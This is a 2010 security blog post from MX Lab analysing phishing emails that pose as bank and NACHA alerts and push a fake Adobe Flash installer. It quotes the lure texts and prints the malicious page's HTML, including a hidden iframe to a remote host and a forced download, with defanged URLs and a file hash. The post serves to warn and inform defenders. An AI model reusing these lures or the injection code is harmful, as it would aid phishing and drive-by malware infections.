Adobe Flash malware in what appears as phishing emails

July 23, 2010 Leave a Comment

MX Lab intercepted some emails that appear to be genuine phishing emails but when investigating the included URLs further, they are in fact an attempt to install malware on a computer in the form of an important Flash Player update from Adobe.

Online Banking Account Alert

The first example comes from the spoofed email address “Electronic Payments Association <buttesob62@rowan-glen.com>” with the subject “Online Banking Account Alert!” and this is the body of the email:

You must submit verification documents to continue using your account without interruption. To view the details of this request and submit the required information, click on the following link (or copy & paste it into your web browser):

hxxp://astroereyna.gr/

We thank you for your assistance in this matter.

When visiting the web site with Firefox we got the message “Sorry, you need to install flash player to see this content…” and our donwload manager opened to download the file adobe_flash_install.exe. This is the code of the web site page:

Sorry, you need to install flash player to see this content...

<meta http-equiv="refresh" content="3;url=hxxp://astroereyna.gr/
adobe_flash_install.exe" />
<iframe src='hxxp://diamonddoctor.ru:8080/index.php?pid=10' width='1'
 height='1' style='visibility: hidden;'></iframe>

However, on Safari we got an HTML frameset to access the web site. It appears that some Javascript redirection is active.

An unauthorized transaction billed from your bank account

The second example comes from the spoofed address “Electronic Payments Association <euphemismm215@reagirona.com>”, has the subject “An unauthorized transaction billed from your bank account” and  this is the body of the email:

Dear bank account holder,

The ACH transaction, recently initiated from your bank account, was rejected by the Electronic Payments Association. Please review the transaction report by clicking the link below:

Unauthorized ACH Transaction Report

——————————————————————

Copyright ©2010 by NACHA – The Electronic Payments Association

The text “Unauthorized ACH Transaction Report” contains a link to a fast flux domain. Following the link gives us the following screen in the browser, included with an download of the file adobe_flash_install.exe.

At the time of writing, no AV engines at Virus Total did detect the threat. Virus Total permlink and MD5: 97732f717f50c38714a3f9c8d8c6274a.

Filed under Viruses Tagged with , ,

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Cancel

Connecting to %s

Follow

Get every new post delivered to your Inbox.

Join 108 other followers